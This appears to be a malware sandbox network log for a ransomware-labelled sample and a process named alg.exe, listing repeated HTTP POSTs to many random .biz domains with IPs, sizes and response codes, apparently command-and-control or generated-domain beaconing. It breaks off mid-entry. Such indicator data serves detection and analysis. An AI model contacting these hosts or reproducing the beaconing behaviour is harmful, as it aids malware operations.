2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://qaynky.biz/paik

HTTP Response

200
172.234.222.143:80

http://fwiwk.biz/dsowokpmderaai

http

alg.exe

1.4kB
204 B
6
5

HTTP Request

POST http://fwiwk.biz/dsowokpmderaai
172.234.222.143:80

http://fwiwk.biz/yvw

http

alg.exe

1.3kB
84 B
4
2

HTTP Request

POST http://fwiwk.biz/yvw
34.246.200.160:80

http://tbjrpv.biz/awb

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://tbjrpv.biz/awb

HTTP Response

200
44.221.84.105:80

http://bumxkqgxu.biz/oyv

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
667 B
6
6

HTTP Request

POST http://bumxkqgxu.biz/oyv

HTTP Response

200
18.208.156.248:80

http://deoci.biz/x

http

alg.exe

1.4kB
655 B
6
6

HTTP Request

POST http://deoci.biz/x

HTTP Response

200
54.244.188.177:80

http://dwrqljrr.biz/gkdghdqowbglwt

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
666 B
6
6

HTTP Request

POST http://dwrqljrr.biz/gkdghdqowbglwt

HTTP Response

200
208.100.26.245:80

http://gjogvvpsf.biz/bvlimahcko

http

alg.exe

7.5kB
5.0kB
17
14

HTTP Request

POST http://gytujflc.biz/kxitualufpr

HTTP Response

404

HTTP Request

POST http://gytujflc.biz/plttcyqwrmvn

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/evfpfqigqqwkkpv

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/cikdstvnyfhg

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/lqlqjckxmtpne

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/bvlimahcko

HTTP Response

404
35.164.78.200:80

http://nqwjmb.biz/pgxepktabqwlsi

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://nqwjmb.biz/pgxepktabqwlsi

HTTP Response

200
13.251.16.150:80

http://qaynky.biz/yo

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://qaynky.biz/yo

HTTP Response

200
3.94.10.34:80

http://ytctnunms.biz/rdlcfrplmmnsn

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
659 B
6
6

HTTP Request

POST http://ytctnunms.biz/rdlcfrplmmnsn

HTTP Response

200
165.160.13.20:80

http://myups.biz/cdgq

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

2.9kB
708 B
9
9

HTTP Request

POST http://myups.biz/evrholb

HTTP Response

200

HTTP Request

POST http://myups.biz/cdgq

HTTP Response

200
44.221.84.105:80

http://bumxkqgxu.biz/jh

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://bumxkqgxu.biz/jh

HTTP Response

200
54.244.188.177:80

http://dwrqljrr.biz/paospdfemlfr

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://dwrqljrr.biz/paospdfemlfr

HTTP Response

200
54.244.188.177:80

http://oshhkdluh.biz/dwxn

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
659 B
7
6

HTTP Request

POST http://oshhkdluh.biz/dwxn

HTTP Response

200
35.164.78.200:80

http://nqwjmb.biz/yvkqxkipwavs

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://nqwjmb.biz/yvkqxkipwavs

HTTP Response

200
3.94.10.34:80

http://ytctnunms.biz/qjbovdx

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://ytctnunms.biz/qjbovdx

HTTP Response

200
34.211.97.45:80

http://jpskm.biz/vv

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://jpskm.biz/vv

HTTP Response

200
165.160.15.20:80

http://myups.biz/phefhp

http

alg.exe

2.6kB
708 B
9
9

HTTP Request

POST http://myups.biz/e

HTTP Response

200

HTTP Request

POST http://myups.biz/phefhp

HTTP Response

200
54.244.188.177:80

http://lrxdmhrr.biz/f

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://lrxdmhrr.biz/f

HTTP Response

200
54.244.188.177:80

http://oshhkdluh.biz/vaqrwjenfcgdoimi

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://oshhkdluh.biz/vaqrwjenfcgdoimi

HTTP Response

200
18.141.10.107:80

http://wllvnzb.biz/ebnsnrfcmadivrr

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
665 B
6
6

HTTP Request

POST http://wllvnzb.biz/ebnsnrfcmadivrr

HTTP Response

200
34.211.97.45:80

http://jpskm.biz/vhmxekcwgn

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://jpskm.biz/vhmxekcwgn

HTTP Response

200
18.208.156.248:80

http://gnqgo.biz/xch

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://gnqgo.biz/xch

HTTP Response

200
54.244.188.177:80

http://lrxdmhrr.biz/tkfreqok

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://lrxdmhrr.biz/tkfreqok

HTTP Response

200
44.221.84.105:80

http://jhvzpcfg.biz/eumhnkxgxvlha

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://jhvzpcfg.biz/eumhnkxgxvlha

HTTP Response

200
18.141.10.107:80

http://acwjcqqv.biz/lqww

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://acwjcqqv.biz/lqww

HTTP Response

200
18.141.10.107:80

http://wllvnzb.biz/vgtpmxrv

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://wllvnzb.biz/vgtpmxrv

HTTP Response

200
18.208.156.248:80

http://gnqgo.biz/chhvlxbnyeptx

http

alg.exe

1.4kB
655 B
6
6

HTTP Request

POST http://gnqgo.biz/chhvlxbnyeptx

HTTP Response

200
44.213.104.86:80

http://vyome.biz/dfbius

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://vyome.biz/dfbius

HTTP Response

200
44.221.84.105:80

http://jhvzpcfg.biz/osmicrm

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://jhvzpcfg.biz/osmicrm

HTTP Response

200
18.208.156.248:80

http://yauexmxk.biz/ixgtdmsnbehuinty

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
658 B
6
6

HTTP Request

POST http://yauexmxk.biz/ixgtdmsnbehuinty

HTTP Response

200
18.141.10.107:80

http://acwjcqqv.biz/fbogd

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://acwjcqqv.biz/fbogd

HTTP Response

200
13.251.16.150:80

http://iuzpxe.biz/ajndjgmdxag

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

2.9kB
636 B
8
5

HTTP Request

POST http://iuzpxe.biz/ajndjgmdxag

HTTP Response

200
44.213.104.86:80

http://vyome.biz/sbvyanland

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://vyome.biz/sbvyanland

HTTP Response

200
18.208.156.248:80

http://yauexmxk.biz/ijyvhudj

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://yauexmxk.biz/ijyvhudj

HTTP Response

200
13.251.16.150:80

http://iuzpxe.biz/huf

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://iuzpxe.biz/huf

HTTP Response

200
150.171.28.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239360615987_16QLWX2YIZJRGGD7R&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

129.5kB
3.7MB
2677
2673

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301582_1MLHFWTHBIK9NA4JB&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301343_1I707L3L7BW4II7PP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360615986_1M5N6Y5ACPFWCCI4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301173_11CL6NTG6CSIMT5HR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300910_1N1UYW7VSBMF6PTRK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360615987_16QLWX2YIZJRGGD7R&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
13.251.16.150:80

http://sxmiywsfv.biz/yn

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://sxmiywsfv.biz/yn

HTTP Response

200
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
13.251.16.150:80

http://sxmiywsfv.biz/yvitagnvklbvbe

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

2.9kB
639 B
8
5

HTTP Request

POST http://sxmiywsfv.biz/yvitagnvklbvbe

HTTP Response

200
34.211.97.45:80

http://vrrazpdh.biz/wpaskfaew

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://vrrazpdh.biz/wpaskfaew

HTTP Response

200
47.129.31.212:80

http://ftxlah.biz/gloqsmdx

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://ftxlah.biz/gloqsmdx

HTTP Response

200
13.251.16.150:80

http://typgfhb.biz/vu

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://typgfhb.biz/vu

HTTP Response

200
34.211.97.45:80

http://esuzf.biz/toykljwnn

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://esuzf.biz/toykljwnn

HTTP Response

200
3.94.10.34:80

http://gvijgjwkh.biz/rrslewr

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://gvijgjwkh.biz/rrslewr

HTTP Response

200
34.211.97.45:80

http://vrrazpdh.biz/maqbkeaqcbtkh

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://vrrazpdh.biz/maqbkeaqcbtkh

HTTP Response

200
44.213.104.86:80

http://qpnczch.biz/w

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://qpnczch.biz/w

HTTP Response

200
47.129.31.212:80

http://ftxlah.biz/vvfyslvjnwdr

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://ftxlah.biz/vvfyslvjnwdr

HTTP Response

200
3.254.94.185:80

http://brsua.biz/glcrkrdbxyijyckh

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://brsua.biz/glcrkrdbxyijyckh

HTTP Response

200
85.214.228.140:80

http://dlynankz.biz/xwjijmwqnuh

http

alg.exe

1.4kB
378 B
5
5

HTTP Request

POST http://dlynankz.biz/xwjijmwqnuh

HTTP Response

404
47.129.31.212:80

http://oflybfv.biz/ywmi

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://oflybfv.biz/ywmi

HTTP Response

200
13.251.16.150:80

http://typgfhb.biz/egctlpn

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://typgfhb.biz/egctlpn

HTTP Response

200
34.211.97.45:80

http://yhqqc.biz/salhskahvruvrcuv

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://yhqqc.biz/salhskahvruvrcuv

HTTP Response

200
34.211.97.45:80

http://esuzf.biz/sp

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://esuzf.biz/sp

HTTP Response

200
47.129.31.212:80

http://mnjmhp.biz/cvafbqvshgednjeh

http

alg.exe

1.4kB
656 B
6
6

HTTP Request

POST http://mnjmhp.biz/cvafbqvshgednjeh

HTTP Response

200
3.94.10.34:80

http://gvijgjwkh.biz/ftkwwo

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
667 B
6
6

HTTP Request

POST http://gvijgjwkh.biz/ftkwwo

HTTP Response

200
44.213.104.86:80

http://qpnczch.biz/nuogu

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://qpnczch.biz/nuogu

HTTP Response

200
18.208.156.248:80

http://opowhhece.biz/tntkdjmqlepeqrd

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://opowhhece.biz/tntkdjmqlepeqrd

HTTP Response

200
3.254.94.185:80

http://brsua.biz/buhwillsnkahdc

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://brsua.biz/buhwillsnkahdc

HTTP Response

200
13.251.16.150:80

http://jdhhbs.biz/le

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://jdhhbs.biz/le

HTTP Response

200
85.214.228.140:80

http://dlynankz.biz/sgofhymid

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
378 B
5
5

HTTP Request

POST http://dlynankz.biz/sgofhymid

HTTP Response

404
47.129.31.212:80

http://oflybfv.biz/myf

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
705 B
7
7

HTTP Request

POST http://oflybfv.biz/myf

HTTP Response

200
34.246.200.160:80

http://mgmsclkyu.biz/mhtdtdoseyinvm

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://mgmsclkyu.biz/mhtdtdoseyinvm

HTTP Response

200
18.141.10.107:80

http://warkcdu.biz/cipbtkgbdwuic

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://warkcdu.biz/cipbtkgbdwuic

HTTP Response

200
34.211.97.45:80

http://yhqqc.biz/xq

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://yhqqc.biz/xq

HTTP Response

200
47.129.31.212:80

http://mnjmhp.biz/xeyhwgjusghv

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
656 B
6
6

HTTP Request

POST http://mnjmhp.biz/xeyhwgjusghv

HTTP Response

200
13.251.16.150:80

http://gcedd.biz/mblrmvhwptqty

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://gcedd.biz/mblrmvhwptqty

HTTP Response

200
18.208.156.248:80

http://opowhhece.biz/wdtuaxbrwwl

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://opowhhece.biz/wdtuaxbrwwl

HTTP Response

200
13.251.16.150:80

http://jdhhbs.biz/pmmohmcpnduukf

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://jdhhbs.biz/pmmohmcpnduukf

HTTP Response

200
18.208.156.248:80

http://jwkoeoqns.biz/ukiefard

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://jwkoeoqns.biz/ukiefard

HTTP Response

200
44.213.104.86:80

http://xccjj.biz/chstmolcvoddsxm

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://xccjj.biz/chstmolcvoddsxm

HTTP Response

200
44.221.84.105:80

http://hehckyov.biz/paxgdiwt

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://hehckyov.biz/paxgdiwt

HTTP Response

200
54.244.188.177:80

http://rynmcq.biz/miaedpo

http

alg.exe

1.4kB
656 B
6
6

HTTP Request

POST http://rynmcq.biz/miaedpo

HTTP Response

200
34.246.200.160:80

http://mgmsclkyu.biz/afjfaxckahjgpxg

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
667 B
6
6

HTTP Request

POST http://mgmsclkyu.biz/afjfaxckahjgpxg

HTTP Response

200
18.141.10.107:80

http://warkcdu.biz/rrqofswiww

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://warkcdu.biz/rrqofswiww

HTTP Response

200
3.254.94.185:80

http://uaafd.biz/eo

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://uaafd.biz/eo

HTTP Response

200
18.141.10.107:80

http://eufxebus.biz/g

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://eufxebus.biz/g

HTTP Response

200
13.251.16.150:80

http://gcedd.biz/vh

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://gcedd.biz/vh

HTTP Response

200
34.246.200.160:80

http://pwlqfu.biz/mokjawbdjkimvpn

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://pwlqfu.biz/mokjawbdjkimvpn

HTTP Response

200
47.129.31.212:80

http://rrqafepng.biz/opolpfukjifrdf

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://rrqafepng.biz/opolpfukjifrdf

HTTP Response

200
18.208.156.248:80

http://jwkoeoqns.biz/ksww

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://jwkoeoqns.biz/ksww

HTTP Response

200
44.213.104.86:80

http://xccjj.biz/lsafplpxmxlox

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
655 B
6
6

HTTP Request

POST http://xccjj.biz/lsafplpxmxlox

HTTP Response

200
44.221.84.105:80

http://hehckyov.biz/dehnogj

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://hehckyov.biz/dehnogj

HTTP Response

200
3.94.10.34:80

http://ctdtgwag.biz/nibxswmiugqsh

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://ctdtgwag.biz/nibxswmiugqsh

HTTP Response

200
54.244.188.177:80

http://rynmcq.biz/q

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
656 B
6
6

HTTP Request

POST http://rynmcq.biz/q

HTTP Response

200
35.164.78.200:80

http://tnevuluw.biz/etihyknx

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://tnevuluw.biz/etihyknx

HTTP Response

200
3.254.94.185:80

http://uaafd.biz/s

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://uaafd.biz/s

HTTP Response

200
18.141.10.107:80

http://whjovd.biz/cwcbrxb

http

alg.exe

1.4kB
656 B
6
6

HTTP Request

POST http://whjovd.biz/cwcbrxb

HTTP Response

200
18.141.10.107:80

http://eufxebus.biz/ptkvnnoblotaspt

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

2.9kB
578 B
7
4

HTTP Request

POST http://eufxebus.biz/ptkvnnoblotaspt

HTTP Response

200
44.221.84.105:80

http://reczwga.biz/eafsxqlvdarkclbx

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://reczwga.biz/eafsxqlvdarkclbx

HTTP Response

200
34.211.97.45:80

http://bghjpy.biz/dltbwlflsvq

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://bghjpy.biz/dltbwlflsvq

HTTP Response

200
18.208.156.248:80

http://damcprvgv.biz/ddcogfgqgnbmdg

http

alg.exe

1.5kB
659 B
7
6

HTTP Request

POST http://damcprvgv.biz/ddcogfgqgnbmdg

HTTP Response

200
34.246.200.160:80

http://pwlqfu.biz/gtvrbhfoanady

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
656 B
6
6

HTTP Request

POST http://pwlqfu.biz/gtvrbhfoanady

HTTP Response

200
47.129.31.212:80

http://rrqafepng.biz/vcxvcowwqmm

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://rrqafepng.biz/vcxvcowwqmm

HTTP Response

200
3.254.94.185:80

http://ocsvqjg.biz/towjpkre

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://ocsvqjg.biz/towjpkre

HTTP Response

200
54.244.188.177:80

http://ywffr.biz/cialfll

http

alg.exe

1.4kB
655 B
7
6

HTTP Request

POST http://ywffr.biz/cialfll

HTTP Response

200
3.94.10.34:80

http://ctdtgwag.biz/levjus

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://ctdtgwag.biz/levjus

HTTP Response

200
54.244.188.177:80

http://ecxbwt.biz/c

http

alg.exe

1.4kB
656 B
6
6

HTTP Request

POST http://ecxbwt.biz/c

HTTP Response

200
35.164.78.200:80

http://tnevuluw.biz/ioqhrbxykhf

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://tnevuluw.biz/ioqhrbxykhf

HTTP Response

200
44.213.104.86:80

http://pectx.biz/lrhajojaonilviwc

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://pectx.biz/lrhajojaonilviwc

HTTP Response

200
18.208.156.248:80

http://zyiexezl.biz/rkmfaitlvd

http

alg.exe

1.5kB
666 B
7
6

HTTP Request

POST http://zyiexezl.biz/rkmfaitlvd

HTTP Response

200
18.141.10.107:80

http://whjovd.biz/rkmfaitlvd

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
664 B
7
6

HTTP Request

POST http://whjovd.biz/rkmfaitlvd

HTTP Response

200
44.221.84.105:80

http://banwyw.biz/cxrlkhprtqe

http

alg.exe

1.4kB
656 B
6
6

HTTP Request

POST http://banwyw.biz/cxrlkhprtqe

HTTP Response

200
72.52.178.23:80

http://wxgzshna.biz/nosfroxqexgsdh

http

alg.exe

1.5kB
244 B
7
6

HTTP Request

POST http://wxgzshna.biz/nosfroxqexgsdh
44.221.84.105:80

http://reczwga.biz/rockb

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
665 B
7
6

HTTP Request

POST http://reczwga.biz/rockb

HTTP Response

200
72.52.178.23:80

http://wxgzshna.biz/dsavdykbjv

http

alg.exe

1.4kB
252 B
6
6

HTTP Request

POST http://wxgzshna.biz/dsavdykbjv
44.221.84.105:80

http://zrlssa.biz/vcbqknlytkbbu

http

alg.exe

1.4kB
664 B
6
6

HTTP Request

POST http://zrlssa.biz/vcbqknlytkbbu

HTTP Response

200
18.141.10.107:80

http://jlqltsjvh.biz/nviyjifo

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://jlqltsjvh.biz/nviyjifo

HTTP Response

200
34.211.97.45:80

http://bghjpy.biz/cqdmnramj

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://bghjpy.biz/cqdmnramj

HTTP Response

200
18.208.156.248:80

http://damcprvgv.biz/yupadylunhwfy

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
667 B
6
6

HTTP Request

POST http://damcprvgv.biz/yupadylunhwfy

HTTP Response

200
3.254.94.185:80

http://ocsvqjg.biz/mndmtaw

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://ocsvqjg.biz/mndmtaw

HTTP Response

200
18.208.156.248:80

http://xyrgy.biz/de

http

alg.exe

1.4kB
655 B
7
6

HTTP Request

POST http://xyrgy.biz/de

HTTP Response

200
54.244.188.177:80

http://ywffr.biz/ey

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

2.8kB
615 B
7
5

HTTP Request

POST http://ywffr.biz/ey

HTTP Response

200
172.234.222.138:80

http://htwqzczce.biz/fdjsyjdmh

http

alg.exe

1.4kB
204 B
6
5

HTTP Request

POST http://htwqzczce.biz/fdjsyjdmh
172.234.222.138:80

http://htwqzczce.biz/bgyfxpgneqbmdrd

http

alg.exe

1.4kB
204 B
6
5

HTTP Request

POST http://htwqzczce.biz/bgyfxpgneqbmdrd
54.244.188.177:80

http://kvbjaur.biz/kidgnxhtlufkka

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://kvbjaur.biz/kidgnxhtlufkka

HTTP Response

200
54.244.188.177:80

http://ecxbwt.biz/ggijh

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://ecxbwt.biz/ggijh

HTTP Response

200
44.221.84.105:80

http://uphca.biz/teqedfknpkosgo

http

alg.exe

1.5kB
663 B
7
6

HTTP Request

POST http://uphca.biz/teqedfknpkosgo

HTTP Response

200
44.213.104.86:80

http://pectx.biz/icehp

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
655 B
7
6

HTTP Request

POST http://pectx.biz/icehp

HTTP Response

200
34.211.97.45:80

http://fjumtfnz.biz/cifnhpxqu

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://fjumtfnz.biz/cifnhpxqu

HTTP Response

200
18.208.156.248:80

http://zyiexezl.biz/hwhkk

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://zyiexezl.biz/hwhkk

HTTP Response

200
34.211.97.45:80

http://hlzfuyy.biz/letlovtcg

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://hlzfuyy.biz/letlovtcg

HTTP Response

200
44.221.84.105:80

http://banwyw.biz/nonvbgwvrqdbuy

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://banwyw.biz/nonvbgwvrqdbuy

HTTP Response

200
72.52.178.23:80

http://wxgzshna.biz/ryp

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.4kB
164 B
4
4

HTTP Request

POST http://wxgzshna.biz/ryp
34.246.200.160:80

http://rffxu.biz/ryp

http

alg.exe

1.4kB
663 B
6
6

HTTP Request

POST http://rffxu.biz/ryp

HTTP Response

200
72.52.178.23:80

http://wxgzshna.biz/ncxgwcra

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
204 B
6
5

HTTP Request

POST http://wxgzshna.biz/ncxgwcra
44.213.104.86:80

http://cikivjto.biz/o

http

alg.exe

1.5kB
658 B
8
6

HTTP Request

POST http://cikivjto.biz/o

HTTP Response

200
44.221.84.105:80

http://zrlssa.biz/glyaeqsxfxck

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
664 B
6
6

HTTP Request

POST http://zrlssa.biz/glyaeqsxfxck

HTTP Response

200
18.141.10.107:80

http://jlqltsjvh.biz/omdjtrtffvh

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
667 B
6
6

HTTP Request

POST http://jlqltsjvh.biz/omdjtrtffvh

HTTP Response

200
47.129.31.212:80

http://qncdaagct.biz/ega

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://qncdaagct.biz/ega

HTTP Response

200
18.208.156.248:80

http://xyrgy.biz/cuoleqtrjcblluy

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
663 B
6
6

HTTP Request

POST http://xyrgy.biz/cuoleqtrjcblluy

HTTP Response

200
172.234.222.143:80

http://htwqzczce.biz/bhvtjlnoyx

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
212 B
6
5

HTTP Request

POST http://htwqzczce.biz/bhvtjlnoyx
172.234.222.143:80

http://htwqzczce.biz/uya

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.6kB
204 B
7
5

HTTP Request

POST http://htwqzczce.biz/uya
13.251.16.150:80

http://shpwbsrw.biz/df

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://shpwbsrw.biz/df

HTTP Response

200
54.244.188.177:80

http://kvbjaur.biz/jxrtranvhdvr

http

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

